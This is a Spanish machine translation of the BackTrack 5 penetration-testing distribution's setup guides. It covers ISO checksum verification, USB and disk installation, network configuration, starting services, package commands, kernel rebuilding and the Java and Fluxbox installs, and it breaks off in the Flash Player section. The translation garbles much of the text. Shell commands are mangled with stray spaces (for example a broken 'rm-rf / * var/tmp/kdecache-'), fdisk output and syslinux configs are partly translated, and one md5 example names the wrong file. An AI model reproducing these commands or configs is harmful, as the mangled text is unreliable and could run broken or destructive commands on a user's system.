Вы находитесь на странице: 1из 108

Introduccin

Descarga de BackTrack - Instalacin de BackTrack - Instalacin de VMware Tools - Uso bsico - Instalar VirtualBox

Descarga de

Contenido
[hide] 1 La descarga BackTrack 2 Verificaci n de la descarga en Linux 3 Verificaci n de la descarga en Windows 4 Verificaci n de la descarga en OSX 5 Notas Importante s 6 Qu sucede despus?

Descarga de BackTrack
Con el lanzamiento de Backtrack 5 que ahora soportan 32 bits, 64 bits y ARM. Backtrack 5 viene con dos gestores de ventanas principales - Gnome y KDE. Usted puede optar por descargar la pgina ya sea una imagen VMWare o una imagen ISO de inicio (recomendado si ejecutar Backtrack desde un LiveCD o una unidad de disco duro / USB). Por favor, use nuestras rplicas oficiales para descargar BackTrack. Estos se pueden encontrar en la pgina de descarga . No utilice un gestor de descargas con nuestros vnculos como la descarga es muy probable que se corrompe.

Verificacin de la descarga en Linux


Una vez que haya descargado BackTrack5 R2, usted debe comprobar la validez del archivo descargado usando md5sum. Esto le permitir eliminar el problema ms comn que enfrentan los usuarios de BackTrack - mal descargado (corrupto) archivos ISO. Para comprobar la suma MD5 de la ISO descargada, utilice el comando md5sum:
root @ bt: ~ # md5sum BT5R2-KDE-32.iso 38ff62f14cecce5c842df60cbadbdb22 BT5R2-KDE-32.iso

root @ bt: ~ #

BackTrack 5 R2 md5sums ISO se resumen a continuacin para su comodidad. BT5r2-KDE-64 KDE 64bit md5sum: 6d5996df868dfe9c31aad234187ad7d0 BT5r2-KDE-32 KDE 32bit md5sum: adb7eece8964aab083294f06aa44b625 BT5r2-GNOME GNOME-64 de 64 bits md5sum: 4864e7cacdc35a886ef8264eb346f414 BT5r2-GNOME GNOME-32 de 32 bits md5sum: 4ad5f359bad43bb934d59fcf6632ae1b BT5R2-GNOME-VM-32 de 32 bits GNOME md5sum: 9a8ec2fb4bbf4a5e626cfeb8970609fd BT5R2-GNOME-VM-64 de 64 bits GNOME md5sum: dad2f4bf1045c56c0104218fa5d68aff BT5r3-KDE-64 KDE 64bit md5sum: 981b897b7fdf34fb1431ba84fe93249f BT5r3-KDE-32 KDE 32bit md5sum: d324687fb891e695089745d461268576 BT5r3-GNOME GNOME-64 de 64 bits md5sum: 8cd98b693ce542b671edecaed48ab06d BT5r3-GNOME GNOME-32 de 32 bits md5sum: aafff8ff5b71fdb6fccdded49a6541a0

Verificacin de la descarga en Windows


1. Para comprobar el md5sum de su BackTrack ISO en Windows, puede utilizar el programa gratuito "HashCalc" herramienta de SlavaSoft HashCalc - Hash, CRC, y la calculadora HMAC 2. Una vez descargado, HashCalc abierta, desactive todas las casillas excepto md5 y cambio de formato de datos a "archivo". 3. En el cuadro de datos en la parte derecha hay un botn con 3 puntos, haga clic en l y vaya a donde descarg el archivo. Iso o. Bz2 y seleccinelo, haga clic en Abrir y luego en "calcular". Despus de unos segundos (o ms, dependiendo la velocidad de su ordenador), habr una cadena de 32 bits junto al md5 palabra, este es el md5 de su archivo. Compare su md5 con el hash md5 de la pgina de descargas. Si son los mismos, entonces su iso o bz2 es buena, si no el archivo est daado y hay que descargarlo de nuevo.

Verificacin de la descarga en OSX


Abre la consola y utilice el comando md5 para calcular su BackTrack ISO md5:
revolucin: ~ $ muts md5 BT5R2-GNOME-32.iso MD5 (BT5R1-GNOME-32.iso) = 49f3dda1e617cb6f4045735766839690 Revolucin: ~ $ muts

Notas Importantes
Los problemas ms comunes encontrados con BackTrack por los recin llegados son: 1. ISO md5sum desajustes, que se traducen en problemas de azar en BackTrack. 2. Medios de comunicacin de baja calidad (en el caso de los DVD), o quemar el archivo ISO a velocidades que son demasiado altos. 3. Burning BackTrack en un DVD como un archivo en lugar de una imagen de disco. Por favor, asegrese de comprobar todo lo que era anterior mencionado antes de comenzar un hilo en el Foro.

Y ahora qu?
El BackTrack 5 imagen ISO es de arranque, lo que significa que usted tendr que o bien quemar el ISO en un DVD o transferirla a un dispositivo USB. Una vez hecho esto, usted ser capaz de arrancar su equipo en el entorno BackTrack Live. A partir de este entorno vivo que puede seguir utilizando BackTrack o instalarlo en su disco duro utilizando una de las guas de instalacin que aparecen en la pgina de instalacin .

Introduccin

Se instala USB - Instala Disco Duro

Nota Importante
Por favor recuerde que a pesar de que proporcionan estas guas de instalacin para que usted siga, no podemos ser responsables de que pierdas tu sistema operativo actualmente instalado / s o datos, ya que no puede dar cuenta de todas las combinaciones de configuracin que pueda tener. Tambin tenga en cuenta que tendr que adaptar cualquiera de estas guas para su entorno concreto.

BackTrack USB Instalaciones

Instalacin en USB con UNetbootin


Easy USB (en vivo o con la persistencia) Instalar usando el instalador de UNetbootin USB .

Instalacin en USB con cambios permanentes


Backtrack Persistent USB Instalacin

Instalacin en USB con Linux Live USB Creator


Alternativa mtodo de instalacin para usuarios de Windows

UNetbootin USB Installer

Herramientas y Preparacin Thumbdrive USB (USB Capacidad de la unidad mnima de 4 GB) Backtrack 5 archivos ISO, md5sum verificado. UNetbootin - Una herramienta para transferir una imagen ISO en una unidad USB

UNetbootin permite crear unidades USB de arranque en vivo para Ubuntu, Fedora y otras distribuciones de Linux sin quemar un CD. Funciona tanto en Windows como Linux. Usted puede dejar que UNetbootin descargar una de las muchas distribuciones soportadas fuera de la caja para usted, o proporcionar su propio Linux. Iso si ya ha descargado uno o su distribucin preferida no est en la lista. Este mtodo de conseguir una instalacin en vivo en una unidad USB es el ms simple disponible utilizando Unetbootin. Tenga en cuenta que vamos a formatear la unidad USB y borrar su contenido. Nota: ahora se pueden guardar los cambios realizados en el sistema al reiniciar (persistencia). Descargue la ltima BackTrack iso de nuestra pgina de descargas BackTrack . Descargar UNetbootin , la ltima versin (Linux, Windows, OSX) Conecte su unidad USB Formatear la unidad USB en FAT32 Iniciar Unetbootin y seleccione la opcin "DiskImage" opcin, elija un BackTrack 5 archivo ISO. Seleccione la cantidad de espacio que se utilizar para la persistencia en MB Seleccione la unidad USB y haga clic en "Aceptar" para crear un arranque USB BackTrack.

Una vez reiniciado, recuerde que el nombre de usuario y la contrasea predeterminados son root / toor.

Persistent USB

Contenido
[hide] 1 Herramient as necesarias y Preparaci n 2 particiones 3 Instalar BackTrack al Thumbdriv e 4 Realice la unidad de inicio 5 Configure Persistenci a Herramientas y Preparacin USB Thumbdrive (Mnimo 8 GB, 16 GB recomendado) Backtrack 5 ISO archivo md5sum verificada, ni un DVD de arranque BT5 Vmware para arrancar el iso si decide realizar todos los pasos desde el interior de una mquina virtual como lo hice No importa la forma que elija, pero tened en cuenta que las designaciones de unidad pueden ser diferentes para usted de lo que eran para m. Esto puede no ser la mejor manera de hacer esto, pero funciona. Estoy seguro de que hay una manera ms elegante de hacer esto que yo pueda volver ms tarde si es necesario y permite tiempo. Particionamiento Muestra las unidades disponibles con el comando siguiente y determinar qu unidad que desea instalar.
dmesg | egrep hd \ |. sd.

La unidad de destino tiene que ser dividido de la siguiente manera: La primera particin debe ser una particin primaria de no ms de 3,5 GB y se puso a escribir vfat (yo he hecho esta particin ms grande de lo necesario a fin de que cubra todo el iso y futuras

versiones). Hacer la particin activa para evitar problemas de arranque. La segunda particin que almacena los cambios deben ocupar el resto del espacio en la memoria USB, o tanto como usted desea asignar a los cambios de ahorro (4,5 GB en un mnimo absoluto). Ejecute los siguientes comandos para realizar la particin.
fdisk / dev / sdb

# Utilice la letra de unidad correspondiente a su sistema. Eliminar todas las particiones existentes
Command (m for help): d Nmero de particin (1-4): 1

Crear la primera particin


Command (m for help): n Comando de accin e extenderse p particin primaria (1-4) p Nmero de particin (1-4): 1 En primer cilindro (1-522, default 1): Utilizando el valor predeterminado 1 ltimo cilindro, cilindros o + tamao + {K, M, G} (1-522, por defecto 522): 3.500 M

Cree la segunda particin


Command (m for help): n Comando de accin e extenderse p particin primaria (1-4) p Nmero de particin (1-4): 2 En primer cilindro (193 a 522, por defecto 193): Utilizando el valor predeterminado 193 ltimo cilindro, cilindros o + tamao + {K, M, G} (193-522, por defecto 522): Utilizando el valor predeterminado 522

Establezca la primera particin a vfat/fat32


Command (m for help): t Nmero de particin (1-4): 1 Cdigo hexadecimal (tipo L a la lista de cdigos): b Se cambi el tipo de sistema de la particin 1 a b (W95 FAT32)

Ajuste la segunda particin para Linux


Command (m for help): t Nmero de particin (1-4): 2 Cdigo hexadecimal (tipo L a la lista de cdigos): 83

Hacer la primera particin activa


Command (m for help): a Nmero de particin (1-4): 1 Command (m for help): w

En este punto, puede que tenga que extraer y volver a insertar el disco para que los cambios de tabla de particin para ser reconocido y para que usted sea capaz de realizar el resto de los pasos. Dar formato a las particiones
mkfs.vfat-F 32-n BT5 / dev/sdb1 mkfs.ext3-b 4096-L casper-rw / dev/sdb2

Tenga en cuenta que la segunda particin debe ser etiquetado como casper-rw exactamente como est escrito aqu, no hay otra etiqueta va a funcionar, ni siquiera si usa tapones en su lugar. Instalar BackTrack al Thumbdrive Montar la primera particin que es sdb1 en este ejemplo.
mkdir / mnt/sdb1 mount / dev/sdb1 / mnt/sdb1

Copie los archivos de la ISO a la unidad USB


cd / mnt/sdb1 rsync-r / cdrom / *.

Este ltimo paso le tomar un par de minutos para el final, quizs ms, dependiendo de la velocidad de las unidades de disco y el mtodo que est utilizando.

Hace que la unidad de arranque


En estos prximos pasos, hacemos los archivos de memoria USB de arranque y copia en su posicin correcta con sus nombres correctos.
syslinux / dev/sdb1

Esto ha hecho que la unidad de arranque, pero a medida que haya archivos del isolinux con syslinux sern nombrados incorrectamente y estar en los lugares equivocados. Fcilmente podemos arreglar eso con los siguientes comandos.
cp-r isolinux syslinux cp syslinux / isolinux.cfg syslinux / syslinux.cfg cp syslinux / isolinux.bin syslinux / syslinux.bin

Configurar la persistencia
Para configurar los modos persistentes en las entradas que queremos, tenemos que hacer lo siguiente:
nano syslinux / syslinux.cfg

Nuestros syslinux.cfg originales se ver as:


defecto vesamenu.c32 prompt 0 Tiempo de espera 300 men de ttulos BackTrack Live CD men splash.png fondo men Color Ttulo 1; 37; 44 # c0ffffff # 00000000 std etiqueta DEFAULT BackTrack etiqueta men Texto - Modo de arranque predeterminado del texto kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto splash vga = 791 etiqueta STEALTH men de etiqueta BackTrack Stealth - No activar Networking kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip splash vga = 791 FORENSICS etiqueta men de etiquetas BackTrack Forensics - No montar el disco o Permuta kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto splash vga = 791 etiqueta NODRM men de etiqueta BackTrack noDRM - No hay controladores DRM kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 etiqueta de depuracin BackTrack etiqueta men Debug - Modo seguro kernel / casper / vmlinuz archivos append = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto etiqueta memtest men de etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest aadir etiqueta hd men Boot etiqueta del disco duro - arranque del primer disco duro LOCALBOOT 0x80 aadir -

En mi caso, yo slo quera aadir un nuevo arranque por defecto, que es exactamente la misma que la

entrada predeterminada original con la excepcin de ser mi nuevo modo persistente. Para hacer lo mismo que usted debe hacer que su syslinux.cfg como la siguiente:
default 0 timeout vesamenu.c32 pronta 300 ttulo del men BackTrack Live CD fondo del men splash.png ttulo de men color 1; 37; 44 # c0ffffff # 00000000 std etiqueta DEFAULT men BackTrack persistente etiqueta de texto - Modo Texto persistente kernel de arranque / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd persistente = / casper / initrd.gz texto splash vga = 791 - texto de la etiqueta etiqueta de men BackTrack Texto Texto de arranque en modo kernel / casper / vmlinuz append file = / cdrom / preseed / boot custom.seed = casper initrd = / casper / initrd.gz texto splash vga = 791 - STEALTH etiqueta etiqueta de men BackTrack Stealth - No Networking habilitado kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrds.gz texto staticip splash vga = 791 - Forensics etiqueta etiqueta de men BackTrack Forensics - No Drive o intercambiar Monte kernel / casper / vmlinuz append archivo = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrdf.gz texto splash vga = 791 - etiqueta NODRM men etiqueta BackTrack noDRM - No DRM Drivers kernel / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto nomodeset splash vga = 791 - debug etiqueta etiqueta de men Debug BackTrack - kernel Modo seguro / casper / vmlinuz append file = / cdrom / preseed / custom.seed boot = casper initrd = / casper / initrd.gz texto - etiqueta memtest men etiqueta BackTrack Memtest - Run memtest kernel / isolinux / memtest append - Sello de men Boot hd etiqueta del disco duro - arrancar el primer disco duro LOCALBOOT 0x80 append -

Ahora tenemos que probar nuestra nueva modalidad persistente. Reinicie el sistema desde un dispositivo USB y seleccione "Texto BackTrack Persistent - Boot persistente Modo Texto" o esperar a que el tiempo de espera para arrancar por defecto. Para probar la persistencia, crear un archivo en cualquier lugar en el sistema, pero una nueva carpeta o archivo de texto en el escritorio es una diferencia visual muy fcil de verificar. Vuelva a arrancar. Si el archivo est ah despus de un reinicio, han tenido xito.

Mtodo de instalacin

Instrucciones para el BT5 Prximamente.

Instalaciones para discos duros

Instalacin de BackTrack en el disco


Cmo instalar BackTrack en disco

Arranque dual con Windows 7 BackTrack


Cmo arranque dual BackTrack Y Windows7

Instalar BackTrack en disco

NOTA: Se recomienda que tenga un mnimo de 20 GB de espacio en disco libre para instalar Backtrack! Arranque el Medio Ambiente Backtrack Live. En el indicador bash, escriba startx para entrar en la interfaz grfica de usuario. Haga doble clic en el Backtrack.sh de instalacin en el escritorio Vamos a pasar por el paso a paso de instalacin:

Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.

Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.

Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.

Ahora es el momento de particionar el disco, para una instalacin de disco completo que elegir la opcin "Borrar y utilizar todo el disco" y haga clic en Siguiente.

ADVERTENCIA: Algunas veces el instalador se queda bloqueado en porcentajes de diferencia, lo dejo por un tiempo, ya que seguir adelante.

Pulse el botn Reiniciar ahora y disfrutar de Backtrack!

Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd. Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.

Dual Boot BackTrack Y Windows7

NOTA: El siguiente mtodo de instalacin es la ms simple disponible. Lo hemos hecho en el supuesto de que usted tiene una instalacin de Windows que est ocupando todo el espacio en el disco y que le gustara cambiar el tamao y crear particiones en el disco duro con el fin de permitir una instalacin BackTrack junto a su Windows. ADVERTENCIA: BACK-UP DE LA INSTALACIN DE WINDOWS PRIMERO! Vamos a pasar por el paso a paso de instalacin: Seleccionamos nuestro idioma, en este caso Ingls y luego haga clic en el botn Adelante.

Hemos destacado por ubicacin geogrfica (La Zona Regin y Hora) y haga clic en Siguiente.

Elegimos la distribucin del teclado. Vamos a dejar el valor por defecto que es EE.UU. y haga clic en Siguiente.

Ahora es el momento de particionar el disco, para una rpida y exitosa de doble arranque de la instalacin vamos a elegir la instalarlas al lado del otro, la eleccin entre ellos cada opcin de inicio y pulse Adelante ..

ADVERTENCIA: El instalador puede parar en ciertos porcentajes, se deja durante unos minutos y se reanudar. Pulse el botn Reiniciar ahora y disfrutar de Backtrack!

Cuando el equipo se inicia, se le dar la opcin de arrancar Backtrack o Windows. Despus del reinicio, puede iniciar sesin con el nombre de usuario root por defecto y Toor contrasea. No se olvide de cambiar esta contrasea de root por defecto con el comando passwd. Como se puede ver la pantalla de bienvenida desapareci despus del reinicio. Para solucionarlo basta con ejecutar fix-splash, y la pantalla de bienvenida aparecer en el siguiente arranque.

Uso bsico

Contenido
[hide] 1 Inicio de sesin en BackTrack 2 A partir de un entorno de interfaz grfica de usuario 3 X no comenzar ! 4 Red Llegar al trabajo 4.1 Co nfig ura ci n de la IP ma nua lme nte 4.2 Obt ene r una dire cci n IP est tica a peg arse entr e rein

Inicio de sesin en BackTrack


Una vez que la instalacin de BackTrack se hace, el nombre de usuario predeterminado y la contrasea necesarios para acceder es root / toor. NOTA: Usted no ser capaz de ver la contrasea mientras la escribe.

A partir de un entorno de interfaz grfica de usuario


Una vez que haya iniciado sesin puede iniciar el entorno grfico con el comando startx.

X no comenzar!
En raras ocasiones (por ejemplo, despus de una instalacin de VMware Tools, o cuando se utilizan tarjetas de vdeo no compatible), X no se iniciar. Si esto sucede, usted tiene varias opciones que usted puede intentar para solucionar el problema: Volver a configurar el paquete del servidor X, se pueden restablecer (y muchas veces arreglarlo) Xorg configuraciones con el siguiente comando:
root @ bt: ~ # dpkg-reconfigure xserver-xorg

Si est utilizando Backtrack 5 en x64 con KDE debera intentar lo siguiente:


root @ bt: ~ # rm / root/.kde/cache- *

NOTA: A veces, puede que tenga que eliminar tambin las carpetas de cach en / var / tmp ejecutando el siguiente comando:
root @ bt: ~ # rm-rf / * var/tmp/kdecache-

Obtencin de redes para trabajar


Si usted no ha notado an BackTrack no se inicia con la creacin de redes de forma predeterminada con el fin de aumentar su sigilo.

Configuracin de la IP manualmente
Primero vamos a configurar la red manualmente. En el siguiente ejemplo vamos a suponer las siguientes direcciones y su finalidad:
Direccin IP - 192.168.1.112/24 Puerta de enlace predeterminada - 192.168.1.1 Servidor DNS - 192.168.1.1

Para configurar estos vamos a ejecutar los siguientes comandos:


root @ bt: ~ # ifconfig eth0 192.168.1.112/24 root @ bt: ~ # route add default gw 192.168.1.1 root @ bt: ~ # echo nameserver 192.168.1.1> / etc / resolv.conf

Obtener una direccin IP esttica a pegarse entre reinicios


Estos ajustes no obstante slo durar hasta que se reinicie, as que si queremos ahorrar entre reinicios tenemos que editar el archivo / etc / network / interfaces de esta manera:
# Este archivo describe las interfaces de red disponibles en el sistema # Y cmo activarlos. Para obtener ms informacin, vea Interfaces (5). # La interfaz de red de bucle invertido auto lo iface lo de bucle de retorno inet # La interfaz de red principal auto eth0 iface eth0 inet esttico direccin 192.168.1.112 mscara de red 255.255.255.0 red 192.168.1.0 difusin 192.168.1.255 gateway 192.168.1.1

Edite el archivo de segn sea apropiado, continuacin, tiene la de redes hecho para arriba automticamente en tiempo de boot:
root @ bt: ~ # update-rc.d valores predeterminados de red root @ bt: ~ # / etc / init.d / networking restart

Obtener una IP de DHCP


Con el fin de obtener una IP de un servidor DHCP que puede emitir el comando dhclient <interface> de la siguiente manera:
root @ bt: ~ # dhclient eth0 Internet Systems Consortium DHCP Client v3.1.1 Copyright 2004-2008 Internet Systems Consortium. Todos los derechos reservados. Para ms informacin, por favor visite http://www.isc.org/sw/dhcp/ Escuchando en LPF/eth0/00: 0c: 29:81:74:21 El envo de LPF/eth0/00: 0c: 29:81:74:21 El envo de Socket / fallback DHCPREQUEST de 192.168.1.112 a 255.255.255.255 eth0 en el puerto 67 DHCPACK de 192.168.1.112 desde 192.168.1.1 obligado a 192.168.1.112 - renovacin en 37.595 segundos. root @ bt: ~ #

Uso de la secuencia de comandos para iniciar la red


Hay una secuencia de comandos para iniciar la red en el directorio / etc / init.d que intenta iniciar cada interfaz de escuchar en / / etc network / interfaces (usted puede quitar los que no es necesario). Para empezar se emita el siguiente comando:
root @ bt: ~ # / etc / init.d / networking inicio

WICD Network Manager


Otra forma de configurar su red est utilizando el Gestor de la Red WICD, usted lo puede encontrar en el men: Men> Internet> Wicd Network Manager NOTA: Tenga en cuenta que al iniciar WICD obtendr un error: Con el fin de deshacerse de este error se debe reiniciar Backtrack, que antes de comenzar WICD abrir un terminal y escriba lo siguiente:
root @ bt: ~ # dpkg-reconfigure wicd root @ bt: ~ # update-rc.d wicd por defecto

Ahora, despus de reiniciar el error no debera ocurrir nunca ms.

Cambio de la contrasea de root


Como ustedes saben Backtrack viene con un nombre de usuario y contrasea por defecto (root / Tur), es importante que cambiemos la contrasea root especialmente cuando se ejecutan servicios como SSH. Podemos cambiar la contrasea con el comando passwd: root @ bt: ~ # passwd Introduzca la nueva contrasea de UNIX: {escriba su contrasea de nuevo aqu} Vuelva a escribir la nueva contrasea UNIX: {introduzca su nueva contrasea} passwd: password updated successfully root @ bt: ~ #

Al iniciar servicios
BackTrack tiene varios servicios como Apache, SSH, MySQL, VNC, etc Todos ellos estn desactivados por defecto. Para iniciar un servicio como SSH, puede utilizar los scripts de inicio. Por ejemplo, para iniciar el servicio SSH:
root @ bt: ~ # sshd-generate # Especfico para el servicio SSH - necesario para generar las claves SSH root @ bt: ~ # / etc / init.d / ssh inicio A partir de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ # / etc / init.d / ssh stop Detencin de OpenBSD Secure Shell servidor: sshd. root @ bt: ~ #

Si utiliza un servidor ssh, por primera vez en Backtrack tendr que generar claves:
root @ bt: ~ # sshd-generate

Para activar un servicio en tiempo de arranque, puede utilizar el comando update-rc.d, por ejemplo, tener SSH inicie durante el arranque:
root @ bt: ~ # update-rc.d-f ssh por defecto Adicin de arranque del sistema para / / etc init.d / ssh ... / Etc/rc0.d/K20ssh -> .. / init.d / ssh / Etc/rc1.d/K20ssh -> .. / init.d / ssh

/ Etc/rc6.d/K20ssh -> .. / init.d / ssh / Etc/rc2.d/S20ssh -> .. / init.d / ssh / Etc/rc3.d/S20ssh -> .. / init.d / ssh / Etc/rc4.d/S20ssh -> .. / init.d / ssh / Etc/rc5.d/S20ssh -> .. / init.d / ssh root @ bt: ~ #

Comunes comandos apt


apt-get install <paquete> Descargas <paquete> y todas sus dependencias, e instala o actualiza ellos. apt-get remove [- purge] <paquete> Elimina <paquete> y los paquetes que dependen de l. - Purge especifica que los paquetes deben ser purgados. apt-get update Actualiza los paquetes listados en el repositorio, deben efectuarse al menos una vez a la semana. apt-get upgrade Upgrades todos los paquetes instalados con las actualizaciones disponibles en el repositorio. debe ejecutarse una vez a la semana. apt-get dist-upgrade [-u] Al igual que apt-get upgrade, salvo que la actualizacin dist-va a instalar o desinstalar paquetes para satisfacer las dependencias. apt-cache search Bsquedas <patrn> paquetes y descripciones de <patrn>. apt-cache <paquete> espectculo Muestra la descripcin completa de <paquete>. apt-cache showpkg <paquete> Muestra muchos ms detalles sobre <paquete>, y sus relaciones con otros paquetes. man apt le dar ms informacin sobre estos comandos, as como muchos de los que son de uso menos frecuente.

Comandos comunes dpkg


dpkg-i <package.deb> Instala un archivo de paquete, uno que ha descargado manualmente, por ejemplo. dpkg-c <package.deb> Muestra el contenido de un archivo <package.deb>. deb. dpkg-i <package.deb> Extractos informacin del paquete de <package.deb> un archivo. deb. dpkg-r <paquete> Quita un paquete instalado llamado <paquete> dpkg-P <paquete> Purgas un paquete instalado llamado <paquete>. La diferencia entre eliminar y purgar es que mientras que eliminar los datos slo se eliminan y ejecutables, purga, tambin se eliminan todos los archivos de configuracin, adems. dpkg-L <paquete> da una lista de todos los archivos instalados por <paquete>. Ver tambin dpkg-c para comprobar el contenido de un archivo. Deb. dpkg-s <paquete> Muestra informacin sobre el <paquete> paquete instalado. Vase tambin apt-cache show para ver la informacin del paquete en el archivo de Debian y dpkg-I para ver la informacin del paquete extrado de un archivo. Deb.

dpkg-reconfigure <paquete> Vuelve a configurar un paquete instalado dpkg Hombre os dar ms informacin sobre estos comandos, as como muchos de los que son de uso menos frecuente.

Cmo puedo encontrar ms informacin acerca de un comando especial o el uso de programas?


La mayora de los comandos tienen lo que se llama una pgina de manual (pgina de manual) que se puede ver escribiendo:
root @ bt: ~ # man <command desea ms informacin ON>

Otro recurso muy bueno en el uso de comandos de Linux se puede encontrar en linuxcommand.org Algunos programas no tienen una pgina de manual, pero por lo general puede conseguir ms informacin sobre su uso, escriba:
root @ bt: ~ # <Nombre Slo el nombre del programa sin ningn arguements.

o
root @ bt: ~ # <Nombre-ayuda

o
root @ bt: ~ # <Nombre - Ayuda

o
root @ bt: ~ # <Nombre-h

Algunos programas utilizan otros mtodos, pero son por lo general slo una variacin de una de las anteriores cinco comandos.

Ncleo

Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar en los registros relacionados .

Cmo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

PAE kernel

Habilitar PAE en Backtrack5 R2 y R3


NOTA: No cambie ninguna otra configuracin de tu kernel a menos que sepa exactamente lo que est haciendo! En este tutorial vamos a proceder a habilitar PAE en Backtrack5 R2. En primer lugar, preparar nuestro kernel y escriba el menuconfig del ncleo.
root @ bt: ~ # preparar-kernel-sources root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config root @ bt :/ usr / src / linux # make menuconfig

Despus de haber lanzado las ncurses menuconfig se procede al permitir PAE que se puede encontrar en las siguientes: Processor type and features -> Soporte de memoria alta (4) -> 64 GB

Una vez que hemos habilitado PAE del menuconfig que avancemos en la construccin de nuestro ncleo.
root @ bt :/ usr / src / linux # make guiones root @ bt :/ usr / src / linux # make preparar

root @ bt :/ usr / src / linux # make root @ bt :/ usr / src / linux # update-initramfs-u root @ bt: ~ # update-grub2

Tenemos que reiniciar el sistema y compruebe si PAE est habilitado. (Ajustar la ruta de acceso al ncleo en ejecucin)
root @ bt: ~ # cat / boot/config-3.2.6 | grep Highmem </ span # CONFIG_HIGHMEM64G no est configurado CONFIG_HIGHMEM = y

Habilitar b43 conductores en Backtrack5 r2

NOTA: Si cambia las opciones adicionales en las ncurses configuracin sin saber cules son las opciones se podra romper su ncleo! Habilitacin b43 conductores en BT5 R2 y R3 se requieren recompilar el kernel.
root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # preparar-kernel-sources root @ bt :/ usr / src / linux # zcat / proc / config.gz>. config root @ bt :/ usr / src / linux # make menuconfig

Configurar el kernel para utilizar B43 en lugar de los controladores predeterminados brcmsmac seleccionando la opcin de soporte BCMA. Para acceder a esta opcin, vaya a:
Drivers de dispositivos -> Broadcom especfico AMBA.

Agregue el apoyo BCMA como mdulo, y "Apoyo a BCMA en el bus PCI-host" como se muestra a continuacin

Salir del men de configuracin ncurses, y construir su paquete kernel:


root @ bt :/ usr / src / linux # make preparar root @ bt :/ usr / src / linux # make root @ bt :/ usr / src / linux # make modules_install root @ bt :/ usr / src / linux # make install root @ bt :/ usr / src / linux # update-initramfs-u root @ bt :/ usr / src / linux # update-grub2

Personalizacin de BackTrack

Preparacin BT5 fuentes del kernel Instalacin de Java Configuracin FluxBox Instalar Flash Player Instalacin de OpenCL

Cmo se prepara BT5 fuentes del mismo (Vmare herramientas, conductores, etc)

De vez en cuando es posible que desee compilar el cdigo que requiere cabeceras del ncleo (como compat-wireless o los conductores de otro tipo). Estas son las instrucciones rpidas sobre cmo hacerlo.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

NOTA: Es necesario estar conectado a Internet para poder descargar el paquete linux-source.

Instalar Java

Instalar Java
Este artculo fue contribuido por g0tmi1k. Twitter: ! https://twitter.com/ # / g0tmi1k NOTA: Antes de instalar Java asegrese de matar Firefox.
root @ bt: ~ # killall -9 / opt / firefox / firefox-bin

Puede descargar Java desde el oficial sitio web . (Descargar versin tar.gz) En primer lugar, crear el directorio java y lugar all:
root @ bt: ~ # mkdir / opt / java root @ bt: ~ # mv-f jre1.7.0_05 / / opt / java /

Cambios finales.
root @ bt: ~ # update-alternatives - install / usr / bin / java java / opt/java/jre1.7.0_05/bin/java 1 root @ bt: ~ # update-alternatives - set java / opt/java/jre1.7.0_05/bin/java

Adicin del complemento para Firefox.


root @ bt: ~ # ln-sf / opt/java/jre1.7.0_05/lib/i386/libnpjp2.so / usr / lib / mozilla / plugins / root @ bt: ~ # export JAVA_HOME = "/ opt/java/jre1.7.0_05/bin/java"

Probando el plugin.
root @ bt: ~ # firefox http://java.com/en/download/testjava.jsp

Instalar Fluxbox

Instalacin FluxBox en BackTrack5


Ahora bien, si usted no lo saba ya, adems de Gnome y KDE BackTrack5 tambin viene con un gestor de ventanas ms ligero llamado FluxBox, para ms informacin, puede visitar su pgina oficial . Conseguir FluxBox en BackTrack5 es bonito, incluso el men BackTrack se generan automticamente, as que vamos a seguir adelante con ella! En primer lugar tenemos que instalar el paquete de flujo para la espalda, que se agarra todo lo que necesitamos para conseguir FluxBox funcionamiento.
root @ bt: ~ # apt-get install flujo para la espalda

Despus de que el script est instalado, veremos que iniciar automticamente la configuracin de Fluxbox.

Una vez que el guin est terminado se le presentar con un mensaje que le indica que debe iniciar su Fluxbox.

Sin embargo antes de que reinicie hay una cosa que tenemos que hacer, vamos a tener que hacer saber a ejecutar BackTrack FluxBox sobre el comando startx y no es por defecto WM.
root @ bt:. ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc root @ bt: ~ # shutdown-r 0

Reinicie el BackTrack y FluxBox enjoy!

NOTA: Para volver a la configuracin predeterminada WM todo lo que tienes que hacer es eliminar el archivo xinitrc..
root @ bt:. ~ # rm-rf ~ / xinitrc root @ bt: ~ # shutdown-r 0

Instale Flash Player

Instale Flash Player


Como te habrs dado cuenta de Flash Player no funciona en Backtrack 5, por lo que para solucionar este problema, primero tenemos que quitar el reproductor de flash actual emitiendo los siguientes comandos:
